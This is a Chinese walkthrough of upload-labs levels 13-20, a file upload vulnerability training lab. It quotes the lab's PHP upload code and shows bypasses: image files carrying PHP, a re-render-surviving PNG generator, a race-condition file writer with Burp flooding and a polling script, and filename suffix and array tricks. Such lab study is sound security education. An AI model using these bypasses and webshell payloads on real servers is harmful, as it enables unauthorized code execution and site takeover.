当前位置: 首页 > news >正文

upload-labs详解(13-20)文件上传分析

目录

upload-labs-env

upload-labs-env第十三关

文件包含漏洞

代码

测试

上传一个.jpg图片

上传一个.png文件

上传一个.gif图片

upload-labs-env第十四关

代码

思路

upload-labs-env第十五关

代码

思路

upload-labs-env第十六关

代码

思路

测试

上传gif格式文件——较简单——比较图片

上传png格式图片——较麻烦

上传jpg格式图片——有一些不能被处理,要多试几次

upload-labs-env第十七关

代码

思路

解题思路

上传测试

使用Burpsuite多次上传

生成

upload-labs-env第十八关

思路

测试

upload-labs-env第十九关

代码

思路一,绕过大小写

思路二

upload-labs-env第二十关

代码

思路

测试


upload-labs-env

upload-labs-env第十三关

文件包含漏洞

以PHP为例,常用的文件包含函数有以下四种 include(),require(),include_once(),require_once()

区别如下:

  • require():找不到被包含的文件会产生致命错误,并停止脚本运行

  • include():找不到被包含的文件只会产生警告,脚本继续执行

  • require_once()与require()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含

  • include_once()与include()类似:唯一的区别是如果该文件的代码已经被包含,则不会再次包含

网页代码

<?php include $_GET['test']; ?>

php代码

<?php phpinfo(); ?>

利用文件包含,我们通过include函数来执行phpinfo.php页面,成功解析

将phpinfo.php文件后缀改为txt后进行访问,依然可以解析:

将phpinfo.php文件后缀改为jpg格式,也可以解析:

可以看出,include()函数并不在意被包含的文件是什么类型,只要有php代码,都会被解析出来。

代码

function getReailFileType($filename){//fopen — 打开文件或者 URL//r - 表示以只读方式打开文件,文件必须存在,b表示以二进制方式打开文件,如果不加b,表示默认加了t,即以文本方式打开文件$file = fopen($filename, "rb");//fread — 读取文件(可安全用于二进制文件),最多读取2字节$bin = fread($file, 2); //只读2字节//fclose — 关闭一个已打开的文件指针,将file指向的文件关闭fclose($file);//unpack 是 PHP 中用于解包二进制数据的函数,它可以将二进制字符串解析为 PHP 数组//@:错误控制运算符,用于抑制可能的警告或错误//C:表示无符号字符(unsigned char),占用 1 字节,范围为 0 到 255//2:表示解析 2 个字节$strInfo = @unpack("C2chars", $bin);//intval - 获取变量的整数值//将 $strInfo['chars1'] 和 $strInfo['chars2'] 的值拼接成一个字符串,然后将其转换为整数$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    $fileType = '';    //文件的后缀(如 .jpg, .png, .gif)通常是通过文件的**魔数(Magic Number)**来确定的,而不是直接通过文件的后缀名。魔数是文件开头的特定字节,用于标识文件的类型。解析前两个字节并拼接后得到的结果,实际上是文件魔数的一部分,用于匹配文件类型。//JPEG:文件头的前两个字节是 0xFFD8,转换为十进制是 255216//PNG:文件头的前两个字节是 0x8950,转换为十进制是 13780//GIF:文件头的前两个字节是 0x4749,转换为十进制是 7173switch($typeCode){      case 255216:            $fileType = 'jpg';break;case 13780:            $fileType = 'png';break;        case 7173:            $fileType = 'gif';break;default:            $fileType = 'unknown';}    return $fileType;
}$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$temp_file = $_FILES['upload_file']['tmp_name'];$file_type = getReailFileType($temp_file);if($file_type == 'unknown'){$msg = "文件未知,上传失败!";}else{$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传出错!";}}
}

测试

先上传一个index.jgp,上传失败,后端对图片内容有检测,使用白名单,只能上传规定格式的文件

使用文件包含,使图片文件中包含php代码生成图片码

copy 00000.jpg /b + test.php /a test.jpg

上传一个.jpg图片

复制图片地址,转到文件包含漏洞的位置

使用get传递file

包含成功

上传一个.png文件

上传一个.gif图片

我们使用010editor编辑index.php文件,在文件头加上gif文件的头,

上传访问

upload-labs-env第十四关

代码

function isImage($filename){$types = '.jpeg|.png|.gif';//file_exists — 检查文件或目录是否存在if(file_exists($filename)){//getimagesize — 取得图像大小$info = getimagesize($filename);//image_type_to_extension — 取得图像类型的文件后缀$ext = image_type_to_extension($info[2]);//stripos — 查找字符串首次出现的位置(不区分大小写)if(stripos($types,$ext)>=0){return $ext;}else{return false;}}else{return false;}
}$is_upload = false;
$msg = null;//isset — 检测变量是否已声明并且其值不为 null
if(isset($_POST['submit'])){//获取上传文件的临时路径$temp_file = $_FILES['upload_file']['tmp_name'];$res = isImage($temp_file);if(!$res){$msg = "文件未知,上传失败!";}else{$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;//move_uploaded_file — 将上传的文件移动到新位置if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传出错!";}}
}

思路

和十三关类似,我们上传一个文件包含的图片

我们使用010editor编辑index.php文件,在文件头加上gif文件的头,

upload-labs-env第十五关

代码

function isImage($filename){//需要开启php_exif模块//exif_imagetype — 判断一个图像的类型//exif_imagetype() 读取一个图像的第一个字节并检查其签名。$image_type = exif_imagetype($filename);switch ($image_type) {case IMAGETYPE_GIF:return "gif";break;case IMAGETYPE_JPEG:return "jpg";break;case IMAGETYPE_PNG:return "png";break;    default:return false;break;}
}$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){$temp_file = $_FILES['upload_file']['tmp_name'];$res = isImage($temp_file);if(!$res){$msg = "文件未知,上传失败!";}else{$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;if(move_uploaded_file($temp_file,$img_path)){$is_upload = true;} else {$msg = "上传出错!";}}
}

思路

也是判断上传文件类型

 //exif_imagetype — 判断一个图像的类型//exif_imagetype() 读取一个图像的第一个字节并检查其签名。

上传测试

upload-labs-env第十六关

代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径$filename = $_FILES['upload_file']['name'];$filetype = $_FILES['upload_file']['type'];$tmpname = $_FILES['upload_file']['tmp_name'];//basename — 返回路径中的文件名部分$target_path=UPLOAD_PATH.'/'.basename($filename);// 获得上传文件的扩展名//strrchr — 查找指定字符在字符串中的最后一次出现//substr从查找的位置按照0,1,2......顺序返回后面的字符$fileext= substr(strrchr($filename,"."),1);//判断文件后缀与类型,合法才进行上传操作if(($fileext == "jpg") && ($filetype=="image/jpeg")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片//imagecreatefromjpeg — 由文件或 URL 创建一个新图象。//图片文件上传之后,打乱生成一个新图片,我们可以找到没有打乱的部分,修改为一句话木马$im = imagecreatefromjpeg($target_path);if($im == false){$msg = "该文件不是jpg格式的图片!";@unlink($target_path);}else{//给新图片指定文件名srand(time());//strval — 获取变量的字符串值$newfilename = strval(rand()).".jpg";//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path = UPLOAD_PATH.'/'.$newfilename;imagejpeg($im,$img_path);@unlink($target_path);$is_upload = true;}} else {$msg = "上传出错!";}}else if(($fileext == "png") && ($filetype=="image/png")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im = imagecreatefrompng($target_path);if($im == false){$msg = "该文件不是png格式的图片!";@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename = strval(rand()).".png";//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path = UPLOAD_PATH.'/'.$newfilename;imagepng($im,$img_path);@unlink($target_path);$is_upload = true;               }} else {$msg = "上传出错!";}}else if(($fileext == "gif") && ($filetype=="image/gif")){if(move_uploaded_file($tmpname,$target_path)){//使用上传的图片生成新的图片$im = imagecreatefromgif($target_path);if($im == false){$msg = "该文件不是gif格式的图片!";@unlink($target_path);}else{//给新图片指定文件名srand(time());$newfilename = strval(rand()).".gif";//显示二次渲染后的图片(使用用户上传图片生成的新图片)$img_path = UPLOAD_PATH.'/'.$newfilename;imagegif($im,$img_path);@unlink($target_path);$is_upload = true;}} else {$msg = "上传出错!";}}else{$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";}
}

思路

寻找没有打乱的部分,上传一句话木马

测试

上传图片,下载被上传之后的图片

上传一个含有一句话木马的test_j.jpg

?? JFIF  ? ?  ? C ? C		?   [" ?            	? ?   } !1AQa "q2亼?#B绷R佯$3br?
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺¥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼??         	? ?   w !1AQ aq"2?B憽绷	#3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬?   ? 齋⒕h?E??颠坾x鈅
x寐V荕礆?e笣A侷鈶p??僯酻Y穾撪弢S'目? 黓姱|!=澱幖盅[茌Y^D?
琟le7F?B独I?y)w苦鵢饩?k鵞馡/V{?Q@聤(???????彽x 倐	x⑦煤暉€4兴﹊焙嵁?YaY?+$珒滎婘_??醂^x玘誹栺7?Wz泛殖鯽k瀂鄠??Q€輲X?<zeG輮彲?/螓?摀~焺T@(QE QE QE QE??php
phpinfo();
?>

下载被上传后的文件

?? JFIF      ? >CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
? C     		$.' ",#(7),01444'9=82<.342? C			2!!22222222222222222222222222222222222222222222222222?   [" ?            	? ?   } !1AQa "q2亼?#B绷R佯$3br?
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz儎厗噲墛挀敃枟槞殺¥ウЖ┆渤吹斗腹郝媚牌侨墒矣哉肿刭卺忏溴骁栝犟蝮趱鲼??         	? ?   w !1AQ aq"2?B憽绷	#3R?br?$4??&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz們剠唶垑姃摂晼棙櫄ⅲぅΗī炒刀犯购旅呐魄壬室釉罩棕仝忏溴骁栝牝篝貊鼬?   ? 麝+嚫蛔?塛??T:l7
錋J$gq??澕?类sW</猨']讄?┹嬮t讑Hn蘪?R唀w.?# -Du碤E
(
(
(
(<趉MF屪铴j1贠?D饄袶徝(e>鄦廕挈=徇靑o飊n皖Ж?汗螯祄"&N誙?撟$猪-
@?QE QE QE QE QE ?

已经将php代码打乱

上传gif格式文件——较简单——比较图片

先找一个gif文件

我们使用010editor软件进行比较

打开工具,比较,选择文件

找到相同部分

我们在文件,插入一句话木马,尽量在00字段插入,不会影响数据

重新上茶访问

上传png格式图片——较麻烦

这里我们使用脚本

demo.php

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,0x66, 0x44, 0x50, 0x33);$img = imagecreatetruecolor(32, 32);for ($y = 0; $y < sizeof($p); $y += 3) {$r = $p[$y];$g = $p[$y+1];$b = $p[$y+2];$color = imagecolorallocate($img, $r, $g, $b);imagesetpixel($img, round($y / 3), 0, $color);
}imagepng($img,'./1.png');
?>

网站打开文件demo.php

运行后得到1.png.上传后下载到本地打开如下图

使用010editor打开,发现一句话木马已经存在了,现在就可以上传运行了

上传jpg格式图片——有一些不能被处理,要多试几次

也是使用脚本

随便找一个jpg图片,先上传至服务器然后再下载到本地保存为1.jpg.

插入php代码

使用脚本处理1.jpg,命令php demo.php 1.jpg

使用16进制编辑器打开,就可以看到插入的php代码.

将生成的payload_1.jpg上传.

将上传的图片再次下载到本地,使用16进制编辑器打开

可以看到,php代码没有被去除. 证明我们成功上传了含有php代码的图片.

需要注意的是,有一些jpg图片不能被处理,所以要多尝试一些jpg图片.

upload-labs-env第十七关

代码

$is_upload = false;
$msg = null;if(isset($_POST['submit'])){//array — 新建一个数组$ext_arr = array('jpg','png','gif');$file_name = $_FILES['upload_file']['name'];$temp_file = $_FILES['upload_file']['tmp_name'];//获取文件后缀$file_ext = substr($file_name,strrpos($file_name,".")+1);$upload_file = UPLOAD_PATH . '/' . $file_name;if(move_uploaded_file($temp_file, $upload_file)){//in_array — 检查数组中是否存在某个值if(in_array($file_ext,$ext_arr)){$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;//rename — 重命名一个文件或目录rename($upload_file, $img_path);$is_upload = true;}else{$msg = "只允许上传.jpg|.png|.gif类型文件!";//unlink — 删除文件unlink($upload_file);}}else{$msg = '上传出错!';}
}

思路

代码处理流程

  • 移动文件到指定路径

  • 判断文件后缀是否符合

  • 符合则重命名

  • 不符合则删除文件

错误点:

先上传,后删除,中间有一个极短的窗口期,文件是在服务器中的,可以进行操作

漏洞:

条件竞争漏洞

在phpcmsv9也有同样的漏洞,可以直接上传webshell

解题思路

创建一个新木马文件creat.php,用于执行时则创建一个info1.php文件

<?php //fputs - fwrite的别名 — 写入文件(可安全用于二进制文件)//fopen — 以写入的方式打开文件或者 URLfputs(fopen('../web.php','w'),'<?php phpinfo();?>');?>
<?php //file_put_contents — 将数据写入文件file_put_concents('../shell.php','<?php phpinfo();?>');?>

建议生成文件到上一层目录

因为同级目录可能会循环删除

上传测试

我们发现上传就被删掉了

使用Burpsuite多次上传

发送到攻击器

添加payload爆破

持续发包

持续的发包,我们也需要不间断的去访问

我们也可以使用Burpsuite不间断的去访问,比手动效率高

生成

在上级目录已经生成web.php文件

访问成功

upload-labs-env第十八关

思路

上传的文件还是先上传,后重命名

使用文件包含,上传一个图片码,在后端代码执行到重命名之前,使用客户端访问到

测试

测试图片码的phpinfo();可不可以执行

可以执行

编辑demo.php

<?php fputs(fopen('../web123.php','w'),'<?php phpinfo();?>');?>

生成图片码

查看图片码

上传抓包爆破

访问查看是否成功

也可以使用Python脚本查看是否有成功的案例

import requests
url = "http://10.212.99.94/include.php?file=upload/web123.png"
while True:html = requests.get(url)if ('Warning' not in str(html.text)):print('ok')break

在上一级目录中生成了重命名后的文件,我们访问可以看到图片码上传成功,

对于没有被重命名的文件,重复上传,是否成功,有一定的运气在其中

upload-labs-env第十九关

代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {//file_exists — 检查文件或目录是否存在if (file_exists(UPLOAD_PATH)) {$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");$file_name = $_POST['save_name'];//pathinfo — 返回文件路径的信息$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);//in_array — 检查数组中是否存在某个值if(!in_array($file_ext,$deny_ext)) {//$_FILES — HTTP 文件上传变量$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH . '/' .$file_name;if (move_uploaded_file($temp_file, $img_path)) { $is_upload = true;}else{$msg = '上传出错!';}}else{$msg = '禁止保存为该类型文件!';}} else {$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';}
}

思路一,绕过大小写

直接上传一个info.phP文件,然后再修改上传名称即可成功上传。

访问

思路二

没有对上传的文件做判断,只对用户输入的文件名做判断 后缀名黑名单 上传的文件名用户可控 黑名单用于用户输入的文件后缀名进行判断 move_uploaded_file()还有这么一个特性,会忽略掉文件末尾的 /.

先准备PHP一句话木马,并把后缀名改为PNG再上传

然后用BP来抓包,效果如下图,就是在upload-19.jpg改为upload-19.php/.

因为Windows的特性后缀改为indexp.php.也可

上传成功

upload-labs-env第二十关

代码

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){//检查MIME$allow_type = array('image/jpeg','image/png','image/gif');//检查上传的文件类型是否在白名单中if(!in_array($_FILES['upload_file']['type'],$allow_type)){$msg = "禁止上传该类型文件!";}else{//检查文件名//如果输入的save_name为空,那么使用原始的文件名,否则使用save_name上传的文件名$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];if (!is_array($file)) {//explode — 使用一个字符串分割另一个字符串//strtolower — 将字符串转化为小写$file = explode('.', strtolower($file));}//end — 将数组的内部指针指向最后一个单元$ext = end($file);$allow_suffix = array('jpg','png','gif');if (!in_array($ext, $allow_suffix)) {$msg = "禁止上传该后缀文件!";}else{//reset — 将数组的内部指针指向第一个单元$file_name = reset($file) . '.' . $file[count($file) - 1];$temp_file = $_FILES['upload_file']['tmp_name'];$img_path = UPLOAD_PATH . '/' .$file_name;if (move_uploaded_file($temp_file, $img_path)) {$msg = "文件上传成功!";$is_upload = true;} else {$msg = "文件上传失败!";}}}
}else{$msg = "请选择要上传的文件!";
}

函数分析

php
empty()   		 //函数用于检查一个变量是否为空。
explode(separator,string,limit) 		 //函数把字符串打散为数组。separator 	必需。规定在哪里分割字符串。string 	必需。要分割的字符串。limit 	可选。规定所返回的数组元素的数目。可能的值:大于 0 - 返回包含最多 limit 个元素的数组小于 0 - 返回包含除了最后的 -limit 个元素以外的所有元素的数组0 - 返回包含一个元素的数组strtolower() 	 //把所有字符转换为小写:  
count()  		 //计算数组中的单元数目,或对象中的属性个数
end() 			 //函数将内部指针指向数组中的最后一个元素,并输出。    
reset()    		 //输出数组中的当前元素和下一个元素的值,然后把数组的内部指针重置到数组中的第一个元素:

思路

需要绕过对非数组进行分割

如果将数组传为save_name=["muma.php",不设置,"jpg"],当我们save_name[1]不设置的时候,count结果仍然是2,但是文件名后缀拼接出来为空,结果为muma.php. 再根据windows特性将.省略,达到文件上传的目的

测试

burpsuite改包

上传查看

我们使用vscode来debug一下,看一下代码内部的走向

if(!empty($_FILES['upload_file'])){

上传不为空,进入if条件语句

$allow_type为image/jpeg

继续

检测上传文件的种类在不在数组$allow_type中

在,进入else条件语句

检测到

传入save_name是个数组,有值,赋值给$file

if (!is_array($file)) {

检测$file是否数组,如果不是,分割成数组

是数组,绕过if条件语句

$ext = end($file);

将数组的最后一位赋值给$ext

即$ext = array(2) = jpg

xxxxxxxxxx2 1    $allow_suffix = array('jpg','png','gif');2    if (!in_array($ext, $allow_suffix)) {

$ext是否在白名单中

进入else条件判断

拼接赋值,数组中第一个值拼接数组中array(数组长度-1)的值

$file_name = test.php.

			//reset — 将数组的内部指针指向第一个单元$file_name = reset($file) . '.' . $file[count($file) - 1];

Windows存储模式,忽略后面的 . 存储为test.php

相关文章:

upload-labs详解(13-20)文件上传分析

目录 upload-labs-env upload-labs-env第十三关 文件包含漏洞 代码 测试 上传一个.jpg图片 上传一个.png文件 上传一个.gif图片 upload-labs-env第十四关 代码 思路 upload-labs-env第十五关 代码 思路 upload-labs-env第十六关 代码 思路 测试 上传gif格式…...

HTML第四节

一.复合选择器 1.后代选择器 注&#xff1a;1.后代选择器会选中后代所有的要选择的标签 2.儿子选择器 3.并集选择器 注&#xff1a;1.注意换行&#xff0c;同时选中多种标签 4.交集选择器 注&#xff1a;1.标签选择器放在最前面&#xff0c;例如放在类选择器的前面 2.两个选择…...

基于 LeNet 网络的 MNIST 数据集图像分类

1.LeNet的原始实验数据集MNIST 名称&#xff1a;MNIST手写数字数据集 数据类型&#xff1a;灰度图 &#xff08;一通道&#xff09; 图像大小&#xff1a;28*28 类别数&#xff1a;10类&#xff08;数字0-9&#xff09; 1.通过torchvision.datasets.MNIST下载并保存到本地…...

win11编译llama_cpp_python cuda128 RTX30/40/50版本

Geforce 50xx系显卡最低支持cuda128&#xff0c;llama_cpp_python官方源只有cpu版本&#xff0c;没有cuda版本&#xff0c;所以自己基于0.3.5版本源码编译一个RTX 30xx/40xx/50xx版本。 1. 前置条件 1. 访问https://developer.download.nvidia.cn/compute/cuda/12.8.0/local_…...

Spring Boot静态资源访问顺序

在 Spring Boot 中&#xff0c;static 和 public 目录都用于存放静态资源&#xff08;如 HTML、CSS、JavaScript、图片等文件&#xff09;&#xff0c;但它们在使用上有一些细微的区别。以下是它们的详细对比&#xff1a; 1. 默认优先级 Spring Boot 会按照以下优先级加载静态…...

电脑总显示串口正在被占用处理方法

1.现象 在嵌入式开发过程中&#xff0c;有很多情况下要使用串口调试&#xff0c;其中485/422/232转usb串口是非常常见的做法。 根据协议&#xff0c;接口芯片不同&#xff0c;需要安装对应的驱动程序&#xff0c;比如ch340&#xff0c;cp2102&#xff0c;CDM212364等驱动。可…...

工具介绍《HACKBAR V2》

HackBar V2 是一款功能强大的浏览器渗透测试工具&#xff0c;主要用于测试 SQL 注入、XSS 漏洞、POST 传参等安全场景。以下是其核心功能、用法及实际案例操作的综合介绍&#xff1a; 一、核心功能与用法详解 1. 基础操作 Load URL 功能&#xff1a;将当前浏览器地址栏的 URL …...

Java算法语法学习 美丽子集的数目 - 力扣 Map接口

文章目录 题目解题思路题解统计数组中每个数字按模k分组的出现次数&#xff0c;并保持数值有序作用 **merge(x, 1, Integer::sum)**解释**检查键是否存在**:**合并现有值**: 示例在代码中的应用**计算余数**:**存储余数及其出现次数**: merge 的常见用法统计频率合并字符串合并…...

Vue项目通过内嵌iframe访问另一个vue页面,获取token适配后端鉴权(以内嵌若依项目举例)

1. 改造子Vue项目进行适配(ruoyi举例) (1) 在路由文件添加需要被外链的vue页面配置 // 若依项目的话是 router/index.js文件 {path: /contrast,component: () > import(/views/contrast/index),hidden: true },(2) 开放白名单 // 若依项目的话是 permission.js 文件 cons…...

梯度本质论:从黎曼流形到神经网络的拓扑寻优

一、微分几何框架下的梯度再诠释 在标准数学分析中&#xff0c;梯度被定义为标量场 f : R n → R f:\mathbb{R}^n→\mathbb{R} f:Rn→R的导数张量 ∇ f ( ∂ f ∂ x 1 , . . . , ∂ f ∂ x n ) \nabla f(\frac{\partial f}{\partial x_1},...,\frac{\partial f}{\partial x_n…...

计算机毕业设计SpringBoot+Vue.js网络海鲜市场系统(源码+文档+PPT+讲解)

温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 温馨提示&#xff1a;文末有 CSDN 平台官方提供的学长联系方式的名片&#xff01; 作者简介&#xff1a;Java领…...

一文对比RAGFLOW和Open WebUI【使用场景参考】

一、RAGFLOW与Open WebUI RAGFLOW是一款基于深度文档理解构建的开源 RAG&#xff08;Retrieval-Augmented Generation&#xff09;引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程&#xff0c;结合大语言模型&#xff08;LLM&#xff09;针对用户各类不…...

2025年03月07日Github流行趋势

项目名称&#xff1a;ai-hedge-fund 项目地址url&#xff1a;https://github.com/virattt/ai-hedge-fund项目语言&#xff1a;Python历史star数&#xff1a;12788今日star数&#xff1a;975项目维护者&#xff1a;virattt, seungwonme, KittatamSaisaard, andorsk, arsaboo项目…...

实训任务2.2 使用Wireshark捕获数据包并分析

目录 【实训目标】 【实训环境】 【实训内容】 【实训步骤】 1.启动WireShark 2. 使用Wireshark捕获数据包 &#xff08;1&#xff09;选择网络接口 &#xff08;2&#xff09;捕获数据包 &#xff08;1&#xff09;设置Wireshark过滤器并捕获数据包 &#xff08;2&…...

C# Lambda 表达式 详解

总目录 前言 在C#编程中&#xff0c;Lambda表达式是一种简洁而强大的语法特性&#xff0c;它提供了一种更加灵活和直观的方式来编写匿名函数。无论是在LINQ查询、事件处理还是异步编程中&#xff0c;Lambda表达式都扮演着重要角色。本文将详细介绍Lambda&#xff0c;帮助您更好…...

wordpress自定the_category的输出结构

通过WordPress的过滤器the_category来自定义输出内容。方法很简单&#xff0c;但是很实用。以下是一个示例代码&#xff1a; function custom_the_category($thelist, $separator , $parents ) {// 获取当前文章的所有分类$categories get_the_category();if (empty($categ…...

HTML前端手册

HTML前端手册 记录前端框架在使用过程中遇到的各种问题和解决方案&#xff0c;供后续快速进行手册翻阅使用 文章目录 HTML前端手册1-前端框架1-TypeScript框架2-CSS框架 2-前端Demo1-Html常用代码 2-知云接力3-Live2D平面动画 3-前端运维1-NPM版本管理 1-前端框架 1-TypeScrip…...

vscode mac版本 配置git

首先使用 type -a git查看git的安装目录 然后在vscode中找到settings配置文件&#xff0c;修改git.path...

爬虫Incapsula reese84加密案例:Etihad航空

声明: 该文章为学习使用,严禁用于商业用途和非法用途,违者后果自负,由此产生的一切后果均与作者无关 一、找出需要加密的参数 1.js运行 atob(‘aHR0cHM6Ly93d3cuZXRpaGFkLmNvbS96aC1jbi8=’) 拿到网址,F12打开调试工具,随便搜索航班,切换到network搜索一个时间点可以找…...

【C#】async与await介绍

1. 实例1 1.1 代码 using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks;namespace ConsoleApp1 {class Program{static void Main(string[] args){Method1();Method2();Console.ReadKey();}public static…...

【银河麒麟高级服务器操作系统实例】虚拟机桥接网络问题分析及处理

更多银河麒麟操作系统产品及技术讨论&#xff0c;欢迎加入银河麒麟操作系统官方论坛 https://forum.kylinos.cn 了解更多银河麒麟操作系统全新产品&#xff0c;请点击访问 麒麟软件产品专区&#xff1a;https://product.kylinos.cn 开发者专区&#xff1a;https://developer…...

Vue3路由组件和一般组件 切换路由时组件挂载和卸载 路由的工作模式

路由组件和一般组件 路由组件 一般放到pages或view目录 一般组件 一般放到component目录 切换路由 切换路由时&#xff0c;组件和执行挂载和卸载 路由的工作模式 Hash模式 缺点 1.不美观&#xff0c;路径带#号 优点 1.兼容性好 一般适用于管理系统 History模式 缺点…...

Spring Boot集成Minio笔记

一、首先配置MinIO 1、MinIO新建Bucket&#xff0c;访问控制台如图 创建访问密钥(就是账号和密码) 二、集成mino添加Minio客户端依赖 1.maven构建方式在pom.xml引入jar <dependency><groupId>io.minio</groupId><artifactId>minio</artifactI…...

linux c++11 gcc4 环境编译安装googletest/gtest v1.10

c11对应googletest/gtest 经过测试&#xff0c;c11对应版本是googletest v1.10.x 编译安装 编译环境 sudo apt-get update sudo apt-get install -y build-essential cmake下载或git clone代码 git clone https://github.com/google/googletest.git cd googletest git che…...

20250306-笔记-精读class CVRPEnv:step(self, selected)

文章目录 前言一、时间步小于 41.1 控制时间步的递增1.2 判断是否在配送中心1.3 特定时间步的操作1.4更新1.4.1 更新当前节点和已选择节点列表1.4.2 更新需求和负载1.4.3 更新访问标记1.4.4 更新负无穷掩码1.4.5 更新步骤状态&#xff0c;将更新后的状态同步到 self.step_state…...

文档进行embedding,Faiss向量检索

这里采用Langchain的HuggingFaceEmbeddings 参照博主&#xff0c;改了一些东西&#xff0c;因为Langchain0.3在0.2的基础上进行了一定的修改 from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain_huggingface import HuggingFaceEmbeddings …...

一周学会Flask3 Python Web开发-在模板中渲染WTForms表单视图函数里获取表单数据

锋哥原创的Flask3 Python Web开发 Flask3视频教程&#xff1a; 2025版 Flask3 Python web开发 视频教程(无废话版) 玩命更新中~_哔哩哔哩_bilibili 为了能够在模板中渲染表单&#xff0c;我们需要把表单类实例传入模板。首先在视图函数里实例化表单类LoginForm&#xff0c;然…...

Android AudioFlinger(五)—— 揭开AudioMixer面纱

前言&#xff1a; 在 Android 音频系统中&#xff0c;AudioMixer 是音频框架中一个关键的组件&#xff0c;用于处理多路音频流的混音操作。它主要存在于音频回放路径中&#xff0c;是 AudioFlinger 服务的一部分。 上一节我们讲threadloop的时候&#xff0c;提到了一个函数pr…...

分类学习(加入半监督学习)

#随机种子固定&#xff0c;随机结果也固定 def seed_everything(seed):torch.manual_seed(seed)torch.cuda.manual_seed(seed)torch.cuda.manual_seed_all(seed)torch.backends.cudnn.benchmark Falsetorch.backends.cudnn.deterministic Truerandom.seed(seed)np.random.see…...

Serilog: 强大的 .NET 日志库

Serilog 是一个功能强大的日志记录库&#xff0c;专为 .NET 平台设计。它提供了丰富的 API 和可插拔的输出器及格式化器&#xff0c;使得开发者能够轻松定制和扩展日志记录功能。在本文中&#xff0c;我们将探索 Serilog 的基础知识、API 使用、配置和一些常见的示例。 1. 日志…...